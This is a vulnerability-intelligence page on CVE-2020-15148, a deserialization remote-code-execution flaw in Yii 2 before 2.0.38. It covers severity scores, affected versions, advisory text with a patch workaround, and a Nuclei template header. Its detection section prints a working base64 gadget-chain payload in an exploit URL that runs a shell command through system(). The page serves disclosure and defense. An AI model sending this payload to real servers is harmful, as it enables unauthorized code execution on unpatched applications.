CVE-2020-15148
published 2020-09-15CVE-2020-15148: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is…
PriorityP182critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EXPLOIT
EPSS
78.76%
99.5th percentile
Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yiiframework | yii | < 2.0.38 | 2.0.38 |
| yiisoft | yii2 | < 2.0.38 | 2.0.38 |
| yiisoft | yii2 | >= 0 < 2.0.38 | 2.0.38 |
Detection & IOCsextracted from sources · hover to see the quote
url/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
otherTzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
- →Exploit delivers a serialized PHP object payload via the `data` GET parameter to `/index.php?r=test/sss`. The payload is base64-encoded and abuses the `yii\db\BatchQueryResult` and `yii\rest\CreateAction` gadget chain to invoke `system()` with `ls -al`.
- →Successful exploitation returns HTTP 500 and response body contains both the string `total` (from `ls -al` output) and `An internal server error occurred.`
- →The vulnerability is triggered when the application calls `unserialize()` on arbitrary user input, enabling a PHP deserialization gadget chain RCE. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Unsafe deserialization in Yii 2
ghsa·2020-09-15
CVE-2020-15148 [HIGH] CWE-502 Unsafe deserialization in Yii 2
Unsafe deserialization in Yii 2
### Impact
Remote code execution in case application calls `unserialize()` on user input containing specially crafted string.
### Patches
2.0.38
### Workarounds
Add the following to BatchQueryResult.php:
```php
public function __sleep()
{
throw new \BadMethodCallException('Cannot serialize '.__CLASS__);
}
public function __wakeup()
{
throw new \BadMethodCallException('Cannot unserialize '.__CLASS__);
}
```
### For more information
If you have any questions or comments about this advisory, [contact us through security form](https://www.yiiframework.com/security).
OSV
Unsafe deserialization in Yii 2
osv·2020-09-15
CVE-2020-15148 [HIGH] Unsafe deserialization in Yii 2
Unsafe deserialization in Yii 2
### Impact
Remote code execution in case application calls `unserialize()` on user input containing specially crafted string.
### Patches
2.0.38
### Workarounds
Add the following to BatchQueryResult.php:
```php
public function __sleep()
{
throw new \BadMethodCallException('Cannot serialize '.__CLASS__);
}
public function __wakeup()
{
throw new \BadMethodCallException('Cannot unserialize '.__CLASS__);
}
```
### For more information
If you have any questions or comments about this advisory, [contact us through security form](https://www.yiiframework.com/security).
No detection rules found.
Nuclei
Yii 2 < 2.0.38 - Remote Code Execution
nuclei·CVSS 10.0
CVE-2020-15148 [CRITICAL] Yii 2 < 2.0.38 - Remote Code Execution
Yii 2 < 2.0.38 - Remote Code Execution
Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.
Template:
id: CVE-2020-15148
info:
name: Yii 2 < 2.0.38 - Remote Code Execution
author: pikpikcu
severity: critical
description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.
reference:
- https://blog.csdn.net/xuandao_ahfengren/article/details/1112599
No writeups or analysis indexed.
https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mjhttps://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj
2020-09-15
Published